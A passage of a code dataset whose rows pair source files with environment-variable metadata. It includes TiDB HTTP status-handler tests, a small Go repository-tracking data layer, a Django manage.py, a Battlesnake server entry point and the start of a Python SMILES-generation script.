ts.prepareData(c)
defer ts.stopServer(c)
resp, err := ts.fetchStatus(fmt.Sprintf("/mvcc/key/tidb/test/1234"))
c.Assert(err, IsNil)
decoder := json.NewDecoder(resp.Body)
var data mvccKV
err = decoder.Decode(&data)
c.Assert(err, IsNil)
c.Assert(data.Value.Info.Lock, IsNil)
c.Assert(data.Value.Info.Writes, IsNil)
c.Assert(data.Value.Info.Values, IsNil)
}
func (ts *HTTPHandlerTestSuite) TestTiFlashReplica(c *C) {
ts.startServer(c)
ts.prepareData(c)
defer ts.stopServer(c)
db, err := sql.Open("mysql", ts.getDSN())
c.Assert(err, IsNil, Commentf("Error connecting"))
defer db.Close()
dbt := &DBTest{c, db}
defer func(originGC bool) {
if originGC {
ddl.EmulatorGCEnable()
} else {
ddl.EmulatorGCDisable()
}
}(ddl.IsEmulatorGCEnable())
// Disable emulator GC.
// Otherwise emulator GC will delete table record as soon as possible after execute drop table DDL.
ddl.EmulatorGCDisable()
gcTimeFormat := "20060102-15:04:05 -0700 MST"
timeBeforeDrop := time.Now().Add(0 - 48*60*60*time.Second).Format(gcTimeFormat)
safePointSQL := `INSERT HIGH_PRIORITY INTO mysql.tidb VALUES ('tikv_gc_safe_point', '%[1]s', ''),('tikv_gc_enable','true','')
ON DUPLICATE KEY
UPDATE variable_value = '%[1]s'`
// Set GC safe point and enable GC.
dbt.mustExec(fmt.Sprintf(safePointSQL, timeBeforeDrop))
resp, err := ts.fetchStatus("/tiflash/replica")
c.Assert(err, IsNil)
decoder := json.NewDecoder(resp.Body)
var data []tableFlashReplicaInfo
err = decoder.Decode(&data)
c.Assert(err, IsNil)
c.Assert(len(data), Equals, 0)
dbt.mustExec("use tidb")
dbt.mustExec("alter table test set tiflash replica 2 location labels 'a','b';")
resp, err = ts.fetchStatus("/tiflash/replica")
c.Assert(err, IsNil)
decoder = json.NewDecoder(resp.Body)
err = decoder.Decode(&data)
c.Assert(err, IsNil)
c.Assert(len(data), Equals, 1)
c.Assert(data[0].ReplicaCount, Equals, uint64(2))
c.Assert(strings.Join(data[0].LocationLabels, ","), Equals, "a,b")
c.Assert(data[0].Available, Equals, false)
resp, err = ts.postStatus("/tiflash/replica", "application/json", bytes.NewBuffer([]byte(`{"id":84,"region_count":3,"flash_region_count":3}`)))
c.Assert(err, IsNil)
c.Assert(resp, NotNil)
body, err := ioutil.ReadAll(resp.Body)
c.Assert(err, IsNil)
c.Assert(string(body), Equals, "[schema:1146]Table which ID = 84 does not exist.")
t, err := ts.domain.InfoSchema().TableByName(model.NewCIStr("tidb"), model.NewCIStr("test"))
c.Assert(err, IsNil)
req := fmt.Sprintf(`{"id":%d,"region_count":3,"flash_region_count":3}`, t.Meta().ID)
resp, err = ts.postStatus("/tiflash/replica", "application/json", bytes.NewBuffer([]byte(req)))
c.Assert(err, IsNil)
c.Assert(resp, NotNil)
body, err = ioutil.ReadAll(resp.Body)
c.Assert(err, IsNil)
c.Assert(string(body), Equals, "")
resp, err = ts.fetchStatus("/tiflash/replica")
c.Assert(err, IsNil)
decoder = json.NewDecoder(resp.Body)
err = decoder.Decode(&data)
c.Assert(err, IsNil)
resp.Body.Close()
c.Assert(len(data), Equals, 1)
c.Assert(data[0].ReplicaCount, Equals, uint64(2))
c.Assert(strings.Join(data[0].LocationLabels, ","), Equals, "a,b")
c.Assert(data[0].Available, Equals, true) // The status should be true now.
// Should not take effect.
dbt.mustExec("alter table test set tiflash replica 2 location labels 'a','b';")
checkFunc := func() {
resp, err = ts.fetchStatus("/tiflash/replica")
c.Assert(err, IsNil)
decoder = json.NewDecoder(resp.Body)
err = decoder.Decode(&data)
c.Assert(err, IsNil)
resp.Body.Close()
c.Assert(len(data), Equals, 1)
c.Assert(data[0].ReplicaCount, Equals, uint64(2))
c.Assert(strings.Join(data[0].LocationLabels, ","), Equals, "a,b")
c.Assert(data[0].Available, Equals, true) // The status should be true now.
}
// Test for get dropped table tiflash replica info.
dbt.mustExec("drop table test")
checkFunc()
// Test unique table id replica info.
dbt.mustExec("flashback table test")
checkFunc()
dbt.mustExec("drop table test")
checkFunc()
dbt.mustExec("flashback table test")
checkFunc()
// Test for partition table.
dbt.mustExec("alter table pt set tiflash replica 2 location labels 'a','b';")
dbt.mustExec("alter table test set tiflash replica 0;")
resp, err = ts.fetchStatus("/tiflash/replica")
c.Assert(err, IsNil)
decoder = json.NewDecoder(resp.Body)
err = decoder.Decode(&data)
c.Assert(err, IsNil)
resp.Body.Close()
c.Assert(len(data), Equals, 3)
c.Assert(data[0].ReplicaCount, Equals, uint64(2))
c.Assert(strings.Join(data[0].LocationLabels, ","), Equals, "a,b")
c.Assert(data[0].Available, Equals, false)
pid0 := data[0].ID
pid1 := data[1].ID
pid2 := data[2].ID
// Mock for partition 1 replica was available.
req = fmt.Sprintf(`{"id":%d,"region_count":3,"flash_region_count":3}`, pid1)
resp, err = ts.postStatus("/tiflash/replica", "application/json", bytes.NewBuffer([]byte(req)))
c.Assert(err, IsNil)
resp.Body.Close()
resp, err = ts.fetchStatus("/tiflash/replica")
c.Assert(err, IsNil)
decoder = json.NewDecoder(resp.Body)
err = decoder.Decode(&data)
c.Assert(err, IsNil)
resp.Body.Close()
c.Assert(len(data), Equals, 3)
c.Assert(data[0].Available, Equals, false)
c.Assert(data[1].Available, Equals, true)
c.Assert(data[2].Available, Equals, false)
// Mock for partition 0,2 replica was available.
req = fmt.Sprintf(`{"id":%d,"region_count":3,"flash_region_count":3}`, pid0)
resp, err = ts.postStatus("/tiflash/replica", "application/json", bytes.NewBuffer([]byte(req)))
c.Assert(err, IsNil)
resp.Body.Close()
req = fmt.Sprintf(`{"id":%d,"region_count":3,"flash_region_count":3}`, pid2)
resp, err = ts.postStatus("/tiflash/replica", "application/json", bytes.NewBuffer([]byte(req)))
c.Assert(err, IsNil)
resp.Body.Close()
checkFunc = func() {
resp, err = ts.fetchStatus("/tiflash/replica")
c.Assert(err, IsNil)
decoder = json.NewDecoder(resp.Body)
err = decoder.Decode(&data)
c.Assert(err, IsNil)
resp.Body.Close()
c.Assert(len(data), Equals, 3)
c.Assert(data[0].Available, Equals, true)
c.Assert(data[1].Available, Equals, true)
c.Assert(data[2].Available, Equals, true)
}
// Test for get truncated table tiflash replica info.
dbt.mustExec("truncate table pt")
dbt.mustExec("alter table pt set tiflash replica 0;")
checkFunc()
}
func (ts *HTTPHandlerTestSuite) TestDecodeColumnValue(c *C) {
ts.startServer(c)
ts.prepareData(c)
defer ts.stopServer(c)
// column is a structure used for test
type column struct {
id int64
tp *types.FieldType
}
// Backfill columns.
c1 := &column{id: 1, tp: types.NewFieldType(mysql.TypeLonglong)}
c2 := &column{id: 2, tp: types.NewFieldType(mysql.TypeVarchar)}
c3 := &column{id: 3, tp: types.NewFieldType(mysql.TypeNewDecimal)}
c4 := &column{id: 4, tp: types.NewFieldType(mysql.TypeTimestamp)}
cols := []*column{c1, c2, c3, c4}
row := make([]types.Datum, len(cols))
row[0] = types.NewIntDatum(100)
row[1] = types.NewBytesDatum([]byte("abc"))
row[2] = types.NewDecimalDatum(types.NewDecFromInt(1))
row[3] = types.NewTimeDatum(types.NewTime(types.FromGoTime(time.Now()), mysql.TypeTimestamp, 6))
// Encode the row.
colIDs := make([]int64, 0, 3)
for _, col := range cols {
colIDs = append(colIDs, col.id)
}
rd := rowcodec.Encoder{Enable: true}
sc := &stmtctx.StatementContext{TimeZone: time.UTC}
bs, err := tablecodec.EncodeRow(sc, row, colIDs, nil, nil, &rd)
c.Assert(err, IsNil)
c.Assert(bs, NotNil)
bin := base64.StdEncoding.EncodeToString(bs)
unitTest := func(col *column) {
path := fmt.Sprintf("/tables/%d/%v/%d/%d?rowBin=%s", col.id, col.tp.Tp, col.tp.Flag, col.tp.Flen, bin)
resp, err := ts.fetchStatus(path)
c.Assert(err, IsNil, Commentf("url:%s", ts.statusURL(path)))
decoder := json.NewDecoder(resp.Body)
var data interface{}
err = decoder.Decode(&data)
c.Assert(err, IsNil, Commentf("url:%v\ndata%v", ts.statusURL(path), data))
colVal, err := types.DatumsToString([]types.Datum{row[col.id-1]}, false)
c.Assert(err, IsNil)
c.Assert(data, Equals, colVal, Commentf("url:%v", ts.statusURL(path)))
}
for _, col := range cols {
unitTest(col)
}
// Test bin has `+`.
// 2018-03-08 16:01:00.315313
bin = "CAIIyAEIBAIGYWJjCAYGAQCBCAgJsZ+TgISg1M8Z"
row[3] = types.NewTimeDatum(types.NewTime(types.FromGoTime(time.Date(2018, 3, 8, 16, 1, 0, 315313000, time.UTC)), mysql.TypeTimestamp, 6))
unitTest(cols[3])
// Test bin has `/`.
// 2018-03-08 02:44:46.409199
bin = "CAIIyAEIBAIGYWJjCAYGAQCBCAgJ7/yY8LKF1M8Z"
row[3] = types.NewTimeDatum(types.NewTime(types.FromGoTime(time.Date(2018, 3, 8, 2, 44, 46, 409199000, time.UTC)), mysql.TypeTimestamp, 6))
unitTest(cols[3])
}
func (ts *HTTPHandlerTestSuite) TestGetIndexMVCC(c *C) {
ts.startServer(c)
ts.prepareData(c)
defer ts.stopServer(c)
// tests for normal index key
resp, err := ts.fetchStatus("/mvcc/index/tidb/test/idx1/1?a=1&b=2")
c.Assert(err, IsNil)
decodeKeyMvcc(resp.Body, c, true)
resp, err = ts.fetchStatus("/mvcc/index/tidb/test/idx2/1?a=1&b=2")
c.Assert(err, IsNil)
decodeKeyMvcc(resp.Body, c, true)
// tests for index key which includes null
resp, err = ts.fetchStatus("/mvcc/index/tidb/test/idx1/3?a=3&b")
c.Assert(err, IsNil)
decodeKeyMvcc(resp.Body, c, true)
resp, err = ts.fetchStatus("/mvcc/index/tidb/test/idx2/3?a=3&b")
c.Assert(err, IsNil)
decodeKeyMvcc(resp.Body, c, true)
// tests for index key which includes empty string
resp, err = ts.fetchStatus("/mvcc/index/tidb/test/idx1/4?a=4&b=")
c.Assert(err, IsNil)
decodeKeyMvcc(resp.Body, c, true)
resp, err = ts.fetchStatus("/mvcc/index/tidb/test/idx2/3?a=4&b=")
c.Assert(err, IsNil)
decodeKeyMvcc(resp.Body, c, true)
// tests for wrong key
resp, err = ts.fetchStatus("/mvcc/index/tidb/test/idx1/5?a=5&b=1")
c.Assert(err, IsNil)
decodeKeyMvcc(resp.Body, c, false)
resp, err = ts.fetchStatus("/mvcc/index/tidb/test/idx2/5?a=5&b=1")
c.Assert(err, IsNil)
decodeKeyMvcc(resp.Body, c, false)
// tests for missing column value
resp, err = ts.fetchStatus("/mvcc/index/tidb/test/idx1/1?a=1")
c.Assert(err, IsNil)
decoder := json.NewDecoder(resp.Body)
var data1 mvccKV
err = decoder.Decode(&data1)
c.Assert(err, NotNil)
resp, err = ts.fetchStatus("/mvcc/index/tidb/test/idx2/1?a=1")
c.Assert(err, IsNil)
decoder = json.NewDecoder(resp.Body)
var data2 mvccKV
err = decoder.Decode(&data2)
c.Assert(err, NotNil)
resp, err = ts.fetchStatus("/mvcc/index/tidb/pt(p2)/idx/666?a=666&b=def")
c.Assert(err, IsNil)
defer resp.Body.Close()
decodeKeyMvcc(resp.Body, c, true)
}
func (ts *HTTPHandlerTestSuite) TestGetSettings(c *C) {
ts.startServer(c)
ts.prepareData(c)
defer ts.stopServer(c)
resp, err := ts.fetchStatus("/settings")
c.Assert(err, IsNil)
decoder := json.NewDecoder(resp.Body)
var settings *config.Config
err = decoder.Decode(&settings)
c.Assert(err, IsNil)
c.Assert(settings, DeepEquals, config.GetGlobalConfig())
}
func (ts *HTTPHandlerTestSuite) TestGetSchema(c *C) {
ts.startServer(c)
ts.prepareData(c)
defer ts.stopServer(c)
resp, err := ts.fetchStatus("/schema")
c.Assert(err, IsNil)
decoder := json.NewDecoder(resp.Body)
var dbs []*model.DBInfo
err = decoder.Decode(&dbs)
c.Assert(err, IsNil)
expects := []string{"information_schema", "metrics_schema", "mysql", "performance_schema", "test", "tidb"}
names := make([]string, len(dbs))
for i, v := range dbs {
names[i] = v.Name.L
}
sort.Strings(names)
c.Assert(names, DeepEquals, expects)
resp, err = ts.fetchStatus("/schema?table_id=5")
c.Assert(err, IsNil)
var t *model.TableInfo
decoder = json.NewDecoder(resp.Body)
err = decoder.Decode(&t)
c.Assert(err, IsNil)
c.Assert(t.Name.L, Equals, "user")
_, err = ts.fetchStatus("/schema?table_id=a")
c.Assert(err, IsNil)
_, err = ts.fetchStatus("/schema?table_id=1")
c.Assert(err, IsNil)
_, err = ts.fetchStatus("/schema?table_id=-1")
c.Assert(err, IsNil)
resp, err = ts.fetchStatus("/schema/tidb")
c.Assert(err, IsNil)
var lt []*model.TableInfo
decoder = json.NewDecoder(resp.Body)
err = decoder.Decode(&lt)
c.Assert(err, IsNil)
c.Assert(len(lt), Greater, 0)
_, err = ts.fetchStatus("/schema/abc")
c.Assert(err, IsNil)
resp, err = ts.fetchStatus("/schema/tidb/test")
c.Assert(err, IsNil)
decoder = json.NewDecoder(resp.Body)
err = decoder.Decode(&t)
c.Assert(err, IsNil)
c.Assert(t.Name.L, Equals, "test")
_, err = ts.fetchStatus("/schema/tidb/abc")
c.Assert(err, IsNil)
resp, err = ts.fetchStatus("/db-table/5")
c.Assert(err, IsNil)
var dbtbl *dbTableInfo
decoder = json.NewDecoder(resp.Body)
err = decoder.Decode(&dbtbl)
c.Assert(err, IsNil)
c.Assert(dbtbl.TableInfo.Name.L, Equals, "user")
c.Assert(dbtbl.DBInfo.Name.L, Equals, "mysql")
se, err := session.CreateSession(ts.store.(kv.Storage))
c.Assert(err, IsNil)
c.Assert(dbtbl.SchemaVersion, Equals, domain.GetDomain(se.(sessionctx.Context)).InfoSchema().SchemaMetaVersion())
db, err := sql.Open("mysql", ts.getDSN())
c.Assert(err, IsNil, Commentf("Error connecting"))
defer db.Close()
dbt := &DBTest{c, db}
dbt.mustExec("create database if not exists test;")
dbt.mustExec("use test;")
dbt.mustExec(` create table t1 (id int KEY)
partition by range (id) (
PARTITION p0 VALUES LESS THAN (3),
PARTITION p1 VALUES LESS THAN (5),
PARTITION p2 VALUES LESS THAN (7),
PARTITION p3 VALUES LESS THAN (9))`)
resp, err = ts.fetchStatus("/schema/test/t1")
c.Assert(err, IsNil)
decoder = json.NewDecoder(resp.Body)
err = decoder.Decode(&t)
c.Assert(err, IsNil)
c.Assert(t.Name.L, Equals, "t1")
resp, err = ts.fetchStatus(fmt.Sprintf("/db-table/%v", t.GetPartitionInfo().Definitions[0].ID))
c.Assert(err, IsNil)
decoder = json.NewDecoder(resp.Body)
err = decoder.Decode(&dbtbl)
c.Assert(err, IsNil)
c.Assert(dbtbl.TableInfo.Name.L, Equals, "t1")
c.Assert(dbtbl.DBInfo.Name.L, Equals, "test")
c.Assert(dbtbl.TableInfo, DeepEquals, t)
}
func (ts *HTTPHandlerTestSuite) TestAllHistory(c *C) {
ts.startServer(c)
ts.prepareData(c)
defer ts.stopServer(c)
_, err := ts.fetchStatus("/ddl/history/?limit=3")
c.Assert(err, IsNil)
_, err = ts.fetchStatus("/ddl/history/?limit=-1")
c.Assert(err, IsNil)
resp, err := ts.fetchStatus("/ddl/history")
c.Assert(err, IsNil)
decoder := json.NewDecoder(resp.Body)
var jobs []*model.Job
s, _ := session.CreateSession(ts.server.newTikvHandlerTool().Store.(kv.Storage))
defer s.Close()
store := domain.GetDomain(s.(sessionctx.Context)).Store()
txn, _ := store.Begin()
txnMeta := meta.NewMeta(txn)
txnMeta.GetAllHistoryDDLJobs()
data, _ := txnMeta.GetAllHistoryDDLJobs()
err = decoder.Decode(&jobs)
c.Assert(err, IsNil)
c.Assert(jobs, DeepEquals, data)
}
func (ts *HTTPHandlerTestSuite) TestPostSettings(c *C) {
ts.startServer(c)
ts.prepareData(c)
defer ts.stopServer(c)
form := make(url.Values)
form.Set("log_level", "error")
form.Set("tidb_general_log", "1")
resp, err := ts.formStatus("/settings", form)
c.Assert(err, IsNil)
c.Assert(resp.StatusCode, Equals, http.StatusOK)
c.Assert(log.GetLevel(), Equals, log.ErrorLevel)
c.Assert(zaplog.GetLevel(), Equals, zap.ErrorLevel)
c.Assert(config.GetGlobalConfig().Log.Level, Equals, "error")
c.Assert(atomic.LoadUint32(&variable.ProcessGeneralLog), Equals, uint32(1))
form = make(url.Values)
form.Set("log_level", "fatal")
form.Set("tidb_general_log", "0")
resp, err = ts.formStatus("/settings", form)
c.Assert(err, IsNil)
c.Assert(resp.StatusCode, Equals, http.StatusOK)
c.Assert(atomic.LoadUint32(&variable.ProcessGeneralLog), Equals, uint32(0))
c.Assert(log.GetLevel(), Equals, log.FatalLevel)
c.Assert(zaplog.GetLevel(), Equals, zap.FatalLevel)
c.Assert(config.GetGlobalConfig().Log.Level, Equals, "fatal")
form.Set("log_level", os.Getenv("log_level"))
// test ddl_slow_threshold
form = make(url.Values)
form.Set("ddl_slow_threshold", "200")
resp, err = ts.formStatus("/settings", form)
c.Assert(err, IsNil)
c.Assert(resp.StatusCode, Equals, http.StatusOK)
c.Assert(atomic.LoadUint32(&variable.DDLSlowOprThreshold), Equals, uint32(200))
// test check_mb4_value_in_utf8
db, err := sql.Open("mysql", ts.getDSN())
c.Assert(err, IsNil, Commentf("Error connecting"))
defer db.Close()
dbt := &DBTest{c, db}
dbt.mustExec("create database tidb_test;")
dbt.mustExec("use tidb_test;")
dbt.mustExec("drop table if exists t2;")
dbt.mustExec("create table t2(a varchar(100) charset utf8);")
form.Set("check_mb4_value_in_utf8", "1")
resp, err = ts.formStatus("/settings", form)
c.Assert(err, IsNil)
c.Assert(resp.StatusCode, Equals, http.StatusOK)
c.Assert(config.GetGlobalConfig().CheckMb4ValueInUTF8, Equals, true)
txn1, err := dbt.db.Begin()
c.Assert(err, IsNil)
_, err = txn1.Exec("insert t2 values (unhex('F0A48BAE'));")
c.Assert(err, NotNil)
txn1.Commit()
// Disable CheckMb4ValueInUTF8.
form = make(url.Values)
form.Set("check_mb4_value_in_utf8", "0")
resp, err = ts.formStatus("/settings", form)
c.Assert(err, IsNil)
c.Assert(resp.StatusCode, Equals, http.StatusOK)
c.Assert(config.GetGlobalConfig().CheckMb4ValueInUTF8, Equals, false)
dbt.mustExec("insert t2 values (unhex('f09f8c80'));")
}
func (ts *HTTPHandlerTestSuite) TestPprof(c *C) {
ts.startServer(c)
defer ts.stopServer(c)
retryTime := 100
for retry := 0; retry < retryTime; retry++ {
resp, err := ts.fetchStatus("/debug/pprof/heap")
if err == nil {
ioutil.ReadAll(resp.Body)
resp.Body.Close()
return
}
time.Sleep(time.Millisecond * 10)
}
zaplog.Fatal("failed to get profile for %d retries in every 10 ms", zap.Int("retryTime", retryTime))
}
func (ts *HTTPHandlerTestSuite) TestServerInfo(c *C) {
ts.startServer(c)
defer ts.stopServer(c)
resp, err := ts.fetchStatus("/info")
c.Assert(err, IsNil)
defer resp.Body.Close()
c.Assert(resp.StatusCode, Equals, http.StatusOK)
decoder := json.NewDecoder(resp.Body)
info := serverInfo{}
err = decoder.Decode(&info)
c.Assert(err, IsNil)
cfg := config.GetGlobalConfig()
c.Assert(info.IsOwner, IsTrue)
c.Assert(info.IP, Equals, cfg.AdvertiseAddress)
c.Assert(info.StatusPort, Equals, cfg.Status.StatusPort)
c.Assert(info.Lease, Equals, cfg.Lease)
c.Assert(info.Version, Equals, mysql.ServerVersion)
c.Assert(info.GitHash, Equals, printer.TiDBGitHash)
store := ts.server.newTikvHandlerTool().Store.(kv.Storage)
do, err := session.GetDomain(store.(kv.Storage))
c.Assert(err, IsNil)
ddl := do.DDL()
c.Assert(info.ID, Equals, ddl.GetID())
}
func (ts *HTTPHandlerTestSuite) TestAllServerInfo(c *C) {
ts.startServer(c)
defer ts.stopServer(c)
resp, err := ts.fetchStatus("/info/all")
c.Assert(err, IsNil)
defer resp.Body.Close()
c.Assert(resp.StatusCode, Equals, http.StatusOK)
decoder := json.NewDecoder(resp.Body)
clusterInfo := clusterServerInfo{}
err = decoder.Decode(&clusterInfo)
c.Assert(err, IsNil)
c.Assert(clusterInfo.IsAllServerVersionConsistent, IsTrue)
c.Assert(clusterInfo.ServersNum, Equals, 1)
store := ts.server.newTikvHandlerTool().Store.(kv.Storage)
do, err := session.GetDomain(store.(kv.Storage))
c.Assert(err, IsNil)
ddl := do.DDL()
c.Assert(clusterInfo.OwnerID, Equals, ddl.GetID())
serverInfo, ok := clusterInfo.AllServersInfo[ddl.GetID()]
c.Assert(ok, Equals, true)
cfg := config.GetGlobalConfig()
c.Assert(serverInfo.IP, Equals, cfg.AdvertiseAddress)
c.Assert(serverInfo.StatusPort, Equals, cfg.Status.StatusPort)
c.Assert(serverInfo.Lease, Equals, cfg.Lease)
c.Assert(serverInfo.Version, Equals, mysql.ServerVersion)
c.Assert(serverInfo.GitHash, Equals, printer.TiDBGitHash)
c.Assert(serverInfo.ID, Equals, ddl.GetID())
}
func (ts *HTTPHandlerTestSuite) TestHotRegionInfo(c *C) {
ts.startServer(c)
defer ts.stopServer(c)
resp, err := ts.fetchStatus("/regions/hot")
c.Assert(err, IsNil)
defer resp.Body.Close()
c.Assert(resp.StatusCode, Equals, http.StatusBadRequest)
}
func (ts *HTTPHandlerTestSuite) TestDebugZip(c *C) {
ts.startServer(c)
defer ts.stopServer(c)
resp, err := ts.fetchStatus("/debug/zip?seconds=1")
c.Assert(err, IsNil)
c.Assert(resp.StatusCode, Equals, http.StatusOK)
b, err := httputil.DumpResponse(resp, true)
c.Assert(err, IsNil)
c.Assert(len(b), Greater, 0)
c.Assert(resp.Body.Close(), IsNil)
}
func (ts *HTTPHandlerTestSuite) TestCheckCN(c *C) {
s := &Server{cfg: &config.Config{Security: config.Security{ClusterVerifyCN: []string{"a ", "b", "c"}}}}
tlsConfig := &tls.Config{}
s.setCNChecker(tlsConfig)
c.Assert(tlsConfig.VerifyPeerCertificate, NotNil)
err := tlsConfig.VerifyPeerCertificate(nil, [][]*x509.Certificate{{{Subject: pkix.Name{CommonName: "a"}}}})
c.Assert(err, IsNil)
err = tlsConfig.VerifyPeerCertificate(nil, [][]*x509.Certificate{{{Subject: pkix.Name{CommonName: "b"}}}})
c.Assert(err, IsNil)
err = tlsConfig.VerifyPeerCertificate(nil, [][]*x509.Certificate{{{Subject: pkix.Name{CommonName: "d"}}}})
c.Assert(err, NotNil)
}
func (ts *HTTPHandlerTestSuite) TestZipInfoForSQL(c *C) {
ts.startServer(c)
defer ts.stopServer(c)
db, err := sql.Open("mysql", ts.getDSN())
c.Assert(err, IsNil, Commentf("Error connecting"))
defer db.Close()
dbt := &DBTest{c, db}
dbt.mustExec("use test")
dbt.mustExec("create table if not exists t (a int)")
urlValues := url.Values{
"sql": {"select * from t"},
"current_db": {"test"},
}
resp, err := ts.formStatus("/debug/sub-optimal-plan", urlValues)
c.Assert(err, IsNil)
c.Assert(resp.StatusCode, Equals, http.StatusOK)
b, err := httputil.DumpResponse(resp, true)
c.Assert(err, IsNil)
c.Assert(len(b), Greater, 0)
c.Assert(resp.Body.Close(), IsNil)
resp, err = ts.formStatus("/debug/sub-optimal-plan?pprof_time=5&timeout=0", urlValues)
c.Assert(err, IsNil)
c.Assert(resp.StatusCode, Equals, http.StatusOK)
b, err = httputil.DumpResponse(resp, true)
c.Assert(err, IsNil)
c.Assert(len(b), Greater, 0)
c.Assert(resp.Body.Close(), IsNil)
resp, err = ts.formStatus("/debug/sub-optimal-plan?pprof_time=5", urlValues)
c.Assert(err, IsNil)
c.Assert(resp.StatusCode, Equals, http.StatusOK)
b, err = httputil.DumpResponse(resp, true)
c.Assert(err, IsNil)
c.Assert(len(b), Greater, 0)
c.Assert(resp.Body.Close(), IsNil)
resp, err = ts.formStatus("/debug/sub-optimal-plan?timeout=1", urlValues)
c.Assert(err, IsNil)
c.Assert(resp.StatusCode, Equals, http.StatusOK)
b, err = httputil.DumpResponse(resp, true)
c.Assert(err, IsNil)
c.Assert(len(b), Greater, 0)
c.Assert(resp.Body.Close(), IsNil)
urlValues.Set("current_db", "non_exists_db")
resp, err = ts.formStatus("/debug/sub-optimal-plan", urlValues)
c.Assert(err, IsNil)
c.Assert(resp.StatusCode, Equals, http.StatusInternalServerError)
b, err = ioutil.ReadAll(resp.Body)
c.Assert(err, IsNil)
c.Assert(string(b), Equals, "use database non_exists_db failed, err: [schema:1049]Unknown database 'non_exists_db'\n")
c.Assert(resp.Body.Close(), IsNil)
}
func (ts *HTTPHandlerTestSuite) TestFailpointHandler(c *C) {
defer ts.stopServer(c)
// start server without enabling failpoint integration
ts.startServer(c)
resp, err := ts.fetchStatus("/fail/")
c.Assert(err, IsNil)
c.Assert(resp.StatusCode, Equals, http.StatusNotFound)
ts.stopServer(c)
// enable failpoint integration and start server
c.Assert(failpoint.Enable("github.com/pingcap/tidb/server/integrateFailpoint", "return"), IsNil)
ts.startServer(c)
resp, err = ts.fetchStatus("/fail/")
c.Assert(err, IsNil)
c.Assert(resp.StatusCode, Equals, http.StatusOK)
b, err := ioutil.ReadAll(resp.Body)
c.Assert(err, IsNil)
c.Assert(strings.Contains(string(b), "github.com/pingcap/tidb/server/integrateFailpoint=return"), IsTrue)
c.Assert(resp.Body.Close(), IsNil)
}
| ["\"log_level\""] | [] | ["log_level"] | [] | ["log_level"] | go | 1 | 0 | |
data.go
|
package main
import (
"fmt"
"os"
"strconv"
"github.com/jhunt/go-db"
)
type RepoWatch struct {
Name string `json:"name"`
Value string `json:"value"`
}
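// UpdateRepos clears the "included" flag on every repository, then re-includes the ones whose watch value is "on".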
func UpdateRepos(d db.DB, lst []RepoWatch) error {
var err error
include := make([]interface{}, 0)
err = d.Exec(`UPDATE repos SET included = 0`)
if err != nil {
return err
}
for _, watch := range lst {
id, err := strconv.ParseInt(watch.Name, 10, 0)
if err != nil {
return err
}
if watch.Value == "on" {
include = append(include, int(id))
err = d.Exec(`UPDATE repos SET included = 1 WHERE id = $1`, int(id))
if err != nil {
return err
}
}
}
return nil
}
func ReadRepos(d db.DB) ([]Repository, error) {
repos, err := d.Query(`SELECT id, org, name, included FROM repos`)
if err != nil {
return nil, err
}
defer repos.Close()
l := make([]Repository, 0)
for repos.Next() {
var (
id, incl int
org, name string
)
err = repos.Scan(&id, &org, &name, &incl)
if err != nil {
return nil, err
}
l = append(l, Repository{
ID: id,
Org: org,
Name: name,
Included: incl == 1,
})
}
return l, nil
}
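// ReadInformation builds a Health snapshot containing every included repository along with its stored issues and pull requests, keyed by "org/name".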
func ReadInformation(d db.DB) (*Health, error) {
health := &Health{
Repos: make(map[string]Repository),
Ignore: os.Getenv("IGNORE"),
}
repos, err := d.Query(`SELECT id, org, name FROM repos WHERE included = 1`)
if err != nil {
return nil, err
}
defer repos.Close()
for repos.Next() {
var (
id int
org, name string
)
err = repos.Scan(&id, &org, &name)
if err != nil {
return nil, err
}
repo := Repository{
ID: id,
Org: org,
Name: name,
}
issues, err := d.Query(`SELECT id, title, reporter, assignees, created_at, updated_at FROM issues WHERE repo_id = $1`, id)
if err != nil {
return nil, err
}
defer issues.Close()
repo.Issues = make([]Issue, 0)
for issues.Next() {
var (
number int
title, reporter, assignees string
created, updated int
)
err = issues.Scan(&number, &title, &reporter, &assignees, &created, &updated)
if err != nil {
return nil, err
}
repo.Issues = append(repo.Issues, Issue{
Number: number,
Title: title,
URL: fmt.Sprintf("https://github.com/%s/%s/issues/%d", repo.Org, repo.Name, number),
Created: created,
Updated: updated,
Reporter: reporter,
Assignees: split(assignees),
})
}
pulls, err := d.Query(`SELECT id, title, reporter, assignees, created_at, updated_at FROM pulls WHERE repo_id = $1`, id)
if err != nil {
return nil, err
}
defer pulls.Close()
repo.PullRequests = make([]PullRequest, 0)
for pulls.Next() {
var (
number int
title, reporter, assignees string
created, updated int
)
err = pulls.Scan(&number, &title, &reporter, &assignees, &created, &updated)
if err != nil {
return nil, err
}
repo.PullRequests = append(repo.PullRequests, PullRequest{
Number: number,
Title: title,
URL: fmt.Sprintf("https://github.com/%s/%s/pull/%d", repo.Org, repo.Name, number),
Created: created,
Updated: updated,
Reporter: reporter,
Assignees: split(assignees),
})
}
health.Repos[fmt.Sprintf("%s/%s", repo.Org, repo.Name)] = repo
}
return health, nil
}
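// DedupePullRequests deletes rows from issues that also appear in pulls, so pull requests are not double-counted as issues.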
func DedupePullRequests(d db.DB) {
switch d.Driver {
case "postgres":
d.Exec(`DELETE FROM issues
USING pulls
WHERE issues.repo_id = pulls.repo_id
AND issues.id = pulls.id`)
case "sqlite3":
d.Exec(`DELETE FROM issues
WHERE EXISTS (
SELECT * FROM pulls
WHERE pulls.id = issues.id
)`)
}
}
|
[
"\"IGNORE\""
] |
[] |
[
"IGNORE"
] |
[]
|
["IGNORE"]
|
go
| 1 | 0 | |
manage.py
|
#!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "apifest.settings")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
|
[] |
[] |
[] |
[]
|
[]
|
python
| 0 | 0 | |
main.go
|
package main
import (
"os"
"log"
"net/http"
)
func main() {
port := os.Getenv("PORT")
if len(port) == 0 {
port = "8080"
}
http.HandleFunc("/", HandleIndex)
http.HandleFunc("/start", HandleStart)
http.HandleFunc("/move", HandleMove)
http.HandleFunc("/end", HandleEnd)
log.Printf("Starting Battlesnake Server at http://0.0.0.0:%s...\n", port)
log.Fatal(http.ListenAndServe(":"+port, nil))
}
|
[
"\"PORT\""
] |
[] |
[
"PORT"
] |
[]
|
["PORT"]
|
go
| 1 | 0 | |
gen_CARAE_con_logP_SAS_TPSA.py
|
from model.CARAE import ARAE
#from utils.utils import *
import numpy as np
import os, sys
import time
import tensorflow as tf
import collections
import copy
from six.moves import cPickle
#os.environ["CUDA_VISIBLE_DEVICES"] = ""
def convert_to_smiles(vector, char):
smiles=""
for i in vector:
smiles+=char[i]
return smiles
